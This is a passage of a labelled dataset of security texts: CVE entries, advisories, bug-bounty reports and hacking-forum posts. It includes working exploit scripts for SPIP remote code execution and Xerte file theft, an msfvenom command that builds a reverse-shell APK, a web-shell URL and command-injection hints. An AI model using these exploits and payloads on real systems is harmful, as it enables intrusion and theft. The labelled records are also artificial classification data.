TRUE.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L588-L593)\n~~~c\n /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */\n if(!socks5_resolve_local && hostname_len > 255) {\n infof(data, \"SOCKS5: server resolving disabled for hostnames of \"\n \"length > 255 [actual len=%zu]\", hostname_len);\n socks5_resolve_local = TRUE;\n }\n~~~\n\nThe local variable `socks5_resolve_local` is changed but, because this is a state machine, subsequent calls to `do_SOCKS` are in a different state and do not make the same change. ==**This is the bug.**==\n\nFor this scenario, the hostname is longer than 255 characters and `do_SOCKS` is on a subsequent call, which means `socks5_resolve_local` remains FALSE. This can happen by chance or be forced by an attacker.\n\nThe client \"hello\" SOCKS packet contains available methods and is sent to the server. State `CONNECT_SOCKS_READ_INIT` => `CONNECT_SOCKS_READ` is entered to parse the server \"hello\" packet (method selection reply). The server has not yet replied so `do_SOCKS` returns `CURLPX_OK`.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L640-L662)\n~~~c\nCONNECT_SOCKS_READ_INIT:\n case CONNECT_SOCKS_READ_INIT:\n sx->outstanding = 2; /* expect two bytes */\n sx->outp = socksreq; /* store it here */\n /* FALLTHROUGH */\n case CONNECT_SOCKS_READ:\n presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,\n \"initial SOCKS5 response\");\n if(CURLPX_OK != presult)\n return presult;\n else if(sx->outstanding) {\n /* remain in reading state */\n return CURLPX_OK;\n }\n else if(socksreq[0] != 5) {\n failf(data, \"Received invalid version in initial SOCKS5 response.\");\n return CURLPX_BAD_VERSION;\n }\n else if(socksreq[1] == 0) {\n /* DONE! No authentication needed. Send request. */\n sxstate(sx, data, CONNECT_REQ_INIT);\n goto CONNECT_REQ_INIT;\n }\n~~~\n\nOn a subsequent call `do_SOCKS` is in the same state where it's waiting for the initial server reply. If the reply is valid, and in this scenario it is, then the state machine will goto `CONNECT_REQ_INIT` which will goto `CONNECT_RESOLVE_REMOTE` since `socks5_resolve_local` is FALSE.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L781-L797)\n~~~c\nCONNECT_REQ_INIT:\n case CONNECT_REQ_INIT:\n if(socks5_resolve_local) {\n enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port", "source": "hackerone", "timestamp": "2023-10-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "61d63fd4d5e14e7762e5", "text": "If you are very beginner then Try Tryhackme . Here you will find a much more constructive guideline. Besides learning you should practice A LOT. Play CTF time to time. You will learn much faster by playing ctf, reading writeups, watching tutorials. Best wishes.", "source": "parrotsec", "timestamp": "2022-03-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9f23f995c0ad08d30db2", "text": "CVE: CVE-2022-24746\n\n[{'lang': 'en', 'value': 'Shopware is an open commerce platform based on the Symfony php Framework and the Vue javascript framework. In affected versions it is possible to inject code via the voucher code form. This issue has been patched in version 6.4.8.1. There are no known workarounds for this issue.'}]\n\nFix commit: NEXT-19276 - Add filtering to promotion and product codes", "source": "cvefixes", "timestamp": "2022-03-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2efc8c469861e581812e", "text": "When I am trying to dnsemum a server I keep getting query timed out. The script I am running is $ dnsenum --dnsserver 127.0.0.1 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt ns.inlanefreight.htb I’m clearly doing something wrong but I cannot seem to figure it out can anyone please support? Simple step by step would be great as Iam Neurodiverse and reading between the lines isn’t a strength of mine haha", "source": "hackthebox", "timestamp": "2023-03-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "de0af3723f4430b2a86a", "text": "How I spot I've been backdoored.\n\nFrom some days I was testing some free rats/obfuscators from github on my main host. I am not sure if I’ve been backdoored. Is there any way to check that. As I really setup my parrot for couple of days and don’t want to install it fresh again. Sometimes when I am out of my PC I can hear a noise from windmill.", "source": "parrotsec", "timestamp": "2022-02-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9b0273934c692e2de220", "text": "msfconsole not importing new custom private modules into the db\n\nAfter following every importation steps from the rapid7 doc correctly msfconsole is still not importing my private modules into the database. The steps I am taking are mkdir -p /root/.msf4/modules/exploits/name/name then I copy with cp -r my code from the dir where it is and after that I ran updatedb.", "source": "hackersploit", "timestamp": "2023-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4a2bd3e8a7b8bac139ce", "text": "CVE: CVE-2022-31081\n\n[{'lang': 'en', 'value': \"HTTP::Daemon is a simple http server class written in perl. Versions prior to 6.15 are subject to a vulnerability which could potentially be exploited to gain privileged access to APIs or poison intermediate caches. It is uncertain how large the risks are, most Perl based applications are served on top of Nginx or Apache, not on the `HTTP::Daemon`. This library is commonly used for local development and tests. Users are advised to update to resolve this issue. Users unable to upgrade may add additional request handling logic as a mitigation. After calling `my $rqst = $conn->get_request()` one could inspect the returned `HTTP::Request` object. Querying the 'Content-Length' (`my $cl = $rqst->header('Content-Length')`) will show any abnormalities that should be dealt with by a `400` response. Expected strings of 'Content-Length' SHOULD consist of either a single non-negative integer, or, a comma separated repetition of that number. (that is `42` or `42, 42, 42`). Anything else MUST be rejected.\"}]\n\nFix commit: Fix Content-Length ', '-separated string issues\n\nAfter a security issue, we ensure we comply to\nRFC-7230 -- HTTP/1.1 Message Syntax and Routing\n- section 3.3.2 -- Content-Length\n- section 3.3.3 -- Message Body Length", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ffc6bafb381a143acfb7", "text": "Click on avatar, next find and click on preferences, [this normally will open your account details] if not click on account. Next to your username should be a pencil symbol, click on this to edit your username.", "source": "parrotsec", "timestamp": "2023-08-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b4adc67934ae7ab3f8cd", "text": "SPIP v4.2.0 - Remote Code Execution (Unauthenticated)\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)\n# Google Dork: inurl:\"/spip.php?page=login\"\n# Date: 19/06/2023\n# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)\n# Vendor Homepage: https://www.spip.net/\n# Software Link: https://files.spip.net/spip/archives/\n# Version: < 4.2.1 (Except few fixed versions indicated in the description)\n# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0\n# CVE reference : CVE-2023-27372 (coiffeur)\n# CVSS : 9.8 (Critical)\n#\n# Vulnerability Description:\n#\n# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.\n#\n# Usage: python3 CVE-2023-27372.py http://example.com\n\nimport argparse\nimport bs4\nimport html\nimport requests\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description=\"Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7\")\n parser.add_argument(\"-u\", \"--url\", default=None, required=True, help=\"SPIP application base URL\")\n parser.add_argument(\"-c\", \"--command\", default=None, required=True, help=\"Command to execute\")\n parser.add_argument(\"-v\", \"--verbose\", default=False, action=\"store_true\", help=\"Verbose mode. (default: False)\")\n return parser.parse_args()\n\ndef get_anticsrf(url):\n r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)\n soup = bs4.BeautifulSoup(r.text, 'html.parser')\n csrf_input = soup.find('input', {'name': 'formulaire_action_args'})\n if csrf_input:\n csrf_value = csrf_input['value']\n if options.verbose:\n print(\"[+] Anti-CSRF token found : %s\" % csrf_value)\n return csrf_value\n else:\n print(\"[-] Unable to find Anti-CSRF token\")\n return -1\n\ndef send_payload(url, payload):\n data = {\n \"page\": \"spip_pass\",\n \"formulaire_action\": \"oubli\",\n \"formulaire_action_args\": csrf,\n \"oubli\": payload\n }\n r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)\n if options.verbose:\n print(\"[+] Execute this payload : %s\" % payload)\n return 0\n\nif __name__ == '__main__':\n options = parseArgs()\n\n requests.packages.urllib3.disable_warnings()\n requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'\n try:\n requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'\n except AttributeError:\n pass\n\n csrf = get_anticsrf(url=options.url)\n send_payload(url=options.url, payload=\"s:%s:\\\"\\\";\" % (20 + len(options.command), options.command))", "source": "exploitdb", "timestamp": "2023-06-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9f5d1c250d1e1b9fc944", "text": "if you run ‘apt list --installed’ first line of output is ‘Listing… Done’ so you need to exclude that line. To get the correct answer command should be ‘apt list --installed | grep “installed” | wc -l’ this will exclude the first line of the output.", "source": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "371cebf51e0b299efc98", "text": "OffSec Metasploit Unleashed - Free Online Ethical Hacking Course Metasploit Unleashed (MSFU) is a Free Online Ethical Hacking Course by Offensive Security, which benefits Hackers for Charity. Learn how to use Metasploit. Est. reading time: 1 minute", "source": "parrotsec", "timestamp": "2023-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "628965d7b308c6d9fa1f", "text": "It’s awesome that you’re diving into the world of Penetration Testing and tackling those CTF challenges. They can be mind-bending, right?", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3e8276111e7f883a5c94", "text": "palak231 said: ↑ Hi this is Palak Sharma. I have completed my engineering and lots of programming languages I learn from here. Python is also my favorite programming language however it was not part of our syllabus but I learn little bit about Python Programming Language from internet. Now I want to enhance my skills and my coding in this programming language, can anyone suggest some best online courses for learning Python Programming Language. Waiting for some positive responses. Thanks Click to expand...", "source": "go4expert", "timestamp": "2023-03-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a9e93120522935c30a3c", "text": "CVE: CVE-2022-1346\n\n[{'lang': 'en', 'value': \"Multiple Stored XSS in GitHub repository causefx/organizr prior to 2.1.1810. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.\"}]\n\nFix commit: added sanitizeUserString and sanitizeEmail functions\nadded sanitize to uploaded image names\nadded sanitize to tabs, categories, users and bookmarks\nremoved svg files from approved image lists", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ba977310988c2823d341", "text": "CVE: CVE-2022-1785\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.4977.'}]\n\nFix commit: patch 8.2.4977: memory access error when substitute expression changes window\n\nProblem: Memory access error when substitute expression changes window.\nSolution: Disallow changing window in substitute expression.", "source": "cvefixes", "timestamp": "2022-05-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "76dbd80f360012951cc1", "text": "You’re almost there. You don’t really need the part after the base64 code (%26from=51459716.txt%26finish=1%26move=1 After to= the encoding is incorrect. Try %7c***bash<<< instead. (Replace *** with the encoded characters). You don’t have to encode <<< either.", "source": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7d5f8135a4975384b6c0", "text": "\"catalog's registry v2 api exposed on unauthenticated path in Harbor\"\n\n[Severity: MEDIUM]\n\n### **Impact**\nJavier Provecho, member of the TCCT (Telefonica Cloud & Cybersecurity Tech better known as ElevenPaths) SRE team discovered a vulnerability regarding Harbor’s v2 API.\n\nThe catalog’s registry v2 api is exposed on an unauthenticated path. The current catalog API path is served at the following path and it requires to be authenticated as an admin.\n\n\"GET /v2/_catalog\"\n\nHowever, the authorization can be bypassed by using the following path\n\n\"GET /v2/_catalog/\"\n\n### **Patches**\nIf your product uses the affected releases of Harbor, update to either version v2.1.2 or v2.0.5 to fix this issue immediately\n\nhttps://github.com/goharbor/harbor/releases/tag/v2.1.2\nhttps://github.com/goharbor/harbor/releases/tag/v2.0.5\n\n### **Workarounds**\nIf you cannot access a patched release, it can be mitigated by disabling that API. For example, redirecting it to a 404 sink hole in the ingress.\n\n### **For more information**\nIf you have any questions or comments about this advisory, contact cncf-harbor-security@lists.cncf.io\nView our security policy at https://github.com/goharbor/harbor/security/policy\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29662", "source": "github_advisory", "timestamp": "2022-02-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "67536fe37b6a0c1845ac", "text": "jsx-slack insufficient patch for CVE-2021-43838 ReDoS\n\n[Severity: MEDIUM]\n\nWe found the patch for CVE-2021-43838 in jsx-slack v4.5.1 is insufficient to save from Regular Expression Denial of Service (ReDoS) attack.\n\nThis vulnerability affects to jsx-slack v4.5.1 and earlier versions.\n\n### Impact\n\nIf attacker can put a lot of JSX elements into `` tag _with including multibyte characters_, an internal regular expression for escaping characters may consume an excessive amount of computing resources.\n\n```javascript\n/** @jsxImportSource jsx-slack */\nimport { Section } from 'jsx-slack'\n\nconsole.log(\n \n \n {[...Array(40)].map(() => (\n 亜
\n ))}\n \n \n)\n```\n\nv4.5.1 has released by passing the test against ASCII characters but missed the case of multibyte characters.\nhttps://github.com/yhatt/jsx-slack/security/advisories/GHSA-55xv-f85c-248q\n\n### Patches\n\njsx-slack v4.5.2 has updated regular expressions for escaping blockquote characters to prevent catastrophic backtracking. It is also including an updated test case to confirm rendering multiple tags in `` with multibyte characters.\n\n### References\n\n- https://github.com/yhatt/jsx-slack/commit/46bc88391d89d5fda4ce689e18ca080bcdd29ecc\n\n### Credits\n\nThanks to @hieki for finding out this vulnerability.", "source": "github_advisory", "timestamp": "2022-01-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6578effa3236ad470af9", "text": "CVE: CVE-2021-43860\n\n[{'lang': 'en', 'value': 'Flatpak is a Linux application sandboxing and distribution framework. Prior to versions 1.12.3 and 1.10.6, Flatpak doesn\\'t properly validate that the permissions displayed to the user for an app at install time match the actual permissions granted to the app at runtime, in the case that there\\'s a null byte in the metadata file of an app. Therefore apps can grant themselves permissions without the consent of the user. Flatpak shows permissions to the user during install by reading them from the \"xa.metadata\" key in the commit metadata. This cannot contain a null terminator, because it is an untrusted GVariant. Flatpak compares these permissions to the *actual* metadata, from the \"metadata\" file to ensure it wasn\\'t lied to. However, the actual metadata contents are loaded in several places where they are read as simple C-style strings. That means that, if the metadata file includes a null terminator, only the content of the file from *before* the terminator gets compared to xa.metadata. Thus, any permissions that appear in the metadata file after a null terminator are applied at runtime but not shown to the user. So maliciously crafted apps can give themselves hidden permissions. Users who have Flatpaks installed from untrusted sources are at risk in case the Flatpak has a maliciously crafted metadata file, either initially or in an update. This issue is patched in versions 1.12.3 and 1.10.6. As a workaround, users can manually check the permissions of installed apps by checking the metadata file or the xa.metadata key on the commit metadata.'}]\n\nFix commit: Ensure that bundles have metadata on install\n\nIf we have a bundle without metadata we wouldn't properly present\nthe permissions in the transaction.", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2d46ff91ea3d2b11b3a5", "text": "CVE: CVE-2022-24738\n\n[{'lang': 'en', 'value': 'Evmos is the Ethereum Virtual Machine (EVM) Hub on the Cosmos Network. In versions of evmos prior to 2.0.1 attackers are able to drain unclaimed funds from user addresses. To do this an attacker must create a new chain which does not enforce signature verification and connects it to the target evmos instance. The attacker can use this joined chain to transfer unclaimed funds. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-5jgq-x857-p8xw\n\n* fix: only enable claims from authorized channels\n\n* changelog\n\n* changelog 2\n\n* fix tests\n\n* rename to authorized\n\n* update forks\n\n* upgrade height\n\n* check for EVM chains\n\n* bonded ration adjustment\n\n* update genesis\n\n* fixes\n\n* swagger", "source": "cvefixes", "timestamp": "2022-03-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e7ac0297e7bf36010efc", "text": "Solved it. Just needed to specify ‘warfiles’ directory inside the archive, that was created by the script, like: /cmd/warfiles/cmd.jsp?cmd=id", "source": "hackthebox", "timestamp": "2023-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bb4ba53b0ea25ee7aa83", "text": "CVE: CVE-2022-2264\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0011: reading beyond the end of the line with put command\n\nProblem: Reading beyond the end of the line with put command.\nSolution: Adjust the end mark position.", "source": "cvefixes", "timestamp": "2022-07-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "bd619df7ee4629311e51", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8465, CVE-2018-8466, CVE-2018-8467.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "336fa1d2683eef9b85f0", "text": "hello evryone as mentioned above by others is better to use echo $var | wc -c using the length count gives and error.hopefully your code is also well written", "source": "hackthebox", "timestamp": "2022-09-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ceee61a623e85401a3cf", "text": "Input key\n\nWhite joining the event it is asking me input key, where am I supposed to get it?", "source": "hackthebox", "timestamp": "2023-03-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bcc8ac641fd9dd1baf7c", "text": "CVE: CVE-2022-23577\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `GetInitOp` is vulnerable to a crash caused by dereferencing a null pointer. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent null dereference read in `GetInitOp`.\n\nWe have a map of maps. We test that the key exists in the first map but then we don't have any validation that this also means the second map has the needed key. In the scenarios where this is not the case, we'll dereference a nullptr, if we don't have this check\n\nPiperOrigin-RevId: 408739325\nChange-Id: If9bb7ed759aba1f3b56a34913f209508dbaf65ce", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f21bd74f8576666021ae", "text": "CVE: CVE-2022-29201\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.QuantizedConv2D` does not fully validate the input arguments. In this case, references get bound to `nullptr` for each argument that is empty. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix undefined behavior in QuantizedConv2D\n\nAdded more input validation and tests. Prior to this, we could get\n`nullptr` exceptions when attempting to access 0th elements of 0-sized\ninputs, leading to security vulnerability bugs.\n\nAlso needed to modify `quantized_conv_ops_test.cc` for consistency.\nPreviously the CPU kernel did technically support passing tensors\nof rank larger than 0 for min/max values. However, the XLA kernels do not.\n\nPiperOrigin-RevId: 445518507", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0ec3273b4dc75d1a64cd", "text": "CVE: CVE-2022-23589\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, Grappler component of TensorFlow can trigger a null pointer dereference. There are 2 places where this can occur, for the same malicious alteration of a `SavedModel` file (fixing the first one would trigger the same dereference in the second place). First, during constant folding, the `GraphDef` might not have the required nodes for the binary operation. If a node is missing, the correposning `mul_*child` would be null, and the dereference in the subsequent line would be incorrect. We have a similar issue during `IsIdentityConsumingSwitch`. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent null pointer dereference in `mutable_graph_view`\n\nPiperOrigin-RevId: 409684472\nChange-Id: I577eb9d9ac470fcec0501423171e739a4ec0cb5c", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fd7cc52a6b3535b251b7", "text": "that’s still a bruteforce unless you did it without using the script but even entering them 1 by one is just manual bruteforce?", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "299f372938887001eb0a", "text": "apktool error after installing openjdk version 8 and recompiling it\n\nmsfvenom -x /home/drevello/Desktop/apks/MX.apk -p android/meterpreter/reverse_tcp LHOST=192.168.42.65 LPORT=19999 R >bind.apk Using APK template: /home/drevello/Desktop/apks/MX.apk [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload [ ] Creating signing key and keystore… [ ] Decompiling original APK… [ ] Decompiling payload APK… [ ] Locating hook point… [ ] Adding payload as package com.mixplorer.qnevh [ ] Loading /tmp/d20230202-3624-16hk09k/original/smali/com/mixplorer/AppImpl.smali and injecting payload… [ ] Poisoning the manifest with meterpreter permissions… [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Rebuilding apk with meterpreter injection as /tmp/d20230202-3624-16hk09k/output.apk [-] I: Using Apktool 2.5.0-dirty I: Checking whether sources has changed… I: Smaling smali folder into classes.dex… Exception in thread “main” java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer; at org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:919) at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:344) at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:300) at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61) at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36) at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:420) at brut.androlib.Androlib.buildSources(Androlib.java:351) at brut.androlib.Androlib.build(Androlib.java:303) at brut.androlib.Androlib.build(Androlib.java:270) at brut.apktool.Main.cmdBuild(Main.java:259) at brut.apktool.Main.main(Main.java:85) Error: apktool execution failed i was using apkbinder script it uses apktool to bind payload and original app and i got this error my hardware and software info: OS: Parrot OS 5.1 (Electro Ara) x86_6 Kernel: 6.0.0-12parrot1-amd64 Uptime: 46 mins Packages: 3259 (dpkg) Shell: bash 5.1.4 Resolution: 1440x900 WM: Metacity (Marco) Theme: ARK-Dark [GTK2/3] Icons: ara [GTK2/3] Terminal: mate-terminal CPU: AMD A6-7480 Radeon R5 2C+6G (2) GPU: AMD ATI Radeon R5/R6/R7 Graphics Memory: 1564MiB / 7399MiB apktool Apktool v2.5.0-dirty - a tool for reengineering Android apk files with smali v2.4.0-debian and baksmali v2.4.0-debian metasploit Framework Version: 6.2.32-dev anyone has solutions", "source": "parrotsec", "timestamp": "2023-02-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5f202d0bc65e11c6f873", "text": "if anyone is stuck on how to get the flag when you got RCE, remember that you cant use LFI if you dont know the path of your target. in other words once you got RCE find the file you need then you can access it with LFI", "source": "hackthebox", "timestamp": "2023-01-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "96e0e2be46b27f73980b", "text": "OpenVas Installation\n\nHi, I am using parrot os version 5.0 (Electro Ara) 64-bit and I am facing problems using preinstalled openvas.When I run gvm-check-setup it shows following error gvm-check-setup 21.4.3 Test completeness and readiness of GVM-21.4.3 Step 1: Checking OpenVAS (Scanner)… ERROR: No OpenVAS Scanner found. FIX: Please install OpenVAS Scanner. ERROR: Your GVM-21.4.3 installation is not yet complete! Please follow the instructions marked with FIX above and run this script again. Could someone help me fix this error.", "source": "hackersploit", "timestamp": "2022-06-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4147a923e75cb66f5bd3", "text": "Try harder\n\nSomeone here tried to get ip by VOIP, gotta know this is a VOIP nr he used from Minnesota while Parrot.org is not there and they would never call me. Additionally I use alias non existant VOIP nr’s and mails. In regard of that further analysis will follow up on that PoS… Screenshot at 2023-11-30 01-53-31 890×816 28.5 KB", "source": "parrotsec", "timestamp": "2023-11-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "953d2068f0cb68fc423a", "text": "Prototype Pollution in set-in\n\n[Severity: CRITICAL]\n\nThe package set-in before 2.0.3 is vulnerable to Prototype Pollution via the `setIn` method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049)", "source": "github_advisory", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "22d3e709504dd81ff4a7", "text": "[Unknown] Electron CVE-2022-35954 Delimiter Injection Vulnerability in exportVariable\n\n## Describe the summary:\nThe Electron Website provides a set of packages to make creating actions easier. The `core.exportVariable` function uses a well known delimiter that attackers can use to break out of that specific variable and assign values to other arbitrary variables. Workflows that write untrusted values to the `GITHUB_ENV` file may cause the path or other environment variables to be modified without the intention of the workflow or action author. Users should upgrade to `@actions/core v1.9.1`. If you are unable to upgrade the `@actions/core` package, you can modify your action to ensure that any user input does not contain the delimiter `_GitHubActionsFileCommandDelimeter_` before calling `core.exportVariable`.\n\n## Impact\n\n[CVE-2022-35954](https://afaghhosting.net/blog/cve-2022-35954/)\nCWE-74\nCWE-77\nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "source": "hackerone", "timestamp": "2022-12-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9e6ba1e9c0f9a14d54b6", "text": "You may like to have a look at these open-source RAT packages: GitHub GitHub - AhMyth/AhMyth-Android-RAT: Android Remote Administration Tool Android Remote Administration Tool. Contribute to AhMyth/AhMyth-Android-RAT development by creating an account on GitHub. GitHub GitHub - screetsec/TheFatRat: Thefatrat a massive exploiting tool : Easy tool... Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and th... Kali Linux Tutorials – 22 Mar 21 Rafel Rat : Android Rat Written In Java!Kalilinuxtutorials Rafel is Remote Access Tool Used to Control Victims Using WebPanel With More Advance Features. Main Features Admin Permission Add App To White List Looks Like Browser Runs In Background Even App is Closed(May not work on some Devices) Accessibility... Est. reading time: 1 minute", "source": "parrotsec", "timestamp": "2022-01-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c6a342e0e5c0b3e5a879", "text": "Hello, “Skills Assessment - Service Login” is connected with “Skills Assessment - Website”. So, the username is what you think. Furthermore, try to follow the hint of only use the first name (Ha***) to create password, use seed to only keep passwords which are compliant with the policy, and create the usernames with UsernameGenerator (here use fullname Ha*** Po****).", "source": "hackthebox", "timestamp": "2022-04-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b8fb0a488f52a9b1febf", "text": "Xerte 3.10.3 - Directory Traversal (Authenticated)\n\n# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)\n# Date: 05/03/2021\n# Exploit Author: Rik Lutz\n# Vendor Homepage: https://xerte.org.uk\n# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip\n# Version: up until 3.10.3\n# Tested on: Windows 10 XAMP\n# CVE : CVE-2021-44665\n\n# This PoC assumes guest login is enabled. Vulnerable url:\n# https:///getfile.php?file=/../../database.php\n# You can find a userfiles-directory by creating a project and browsing the media menu.\n# Create new project from template -> visit \"Properties\" (! symbol) -> Media and Quota -> Click file to download\n# The userfiles-direcotry will be noted in the URL and/or when you download a file.\n# They look like: --\n\nimport requests\nimport re\n\nxerte_base_url = \"http://127.0.0.1\"\nfile_to_grab = \"/../../database.php\"\nphp_session_id = \"\" # If guest is not enabled, and you have a session ID. Put it here.\n\nwith requests.Session() as session:\n # Get a PHP session ID\n if not php_session_id:\n session.get(xerte_base_url)\n else:\n session.cookies.set(\"PHPSESSID\", php_session_id)\n\n # Use a default template\n data = {\n 'tutorialid': 'Nottingham',\n 'templatename': 'Nottingham',\n 'tutorialname': 'exploit',\n 'folder_id': ''\n }\n\n # Create a new project in order to create a user-folder\n template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)\n\n # Find template ID\n data = {\n 'template_id': re.findall('(\\d+)', template_id.text)[0]\n }\n\n # Find the created user-direcotry:\n user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)\n user_direcotry = re.findall('USER-FILES\\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]\n\n # Grab file\n result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)\n print(result.text)\n print(\"|-- Used Variables: --|\")\n 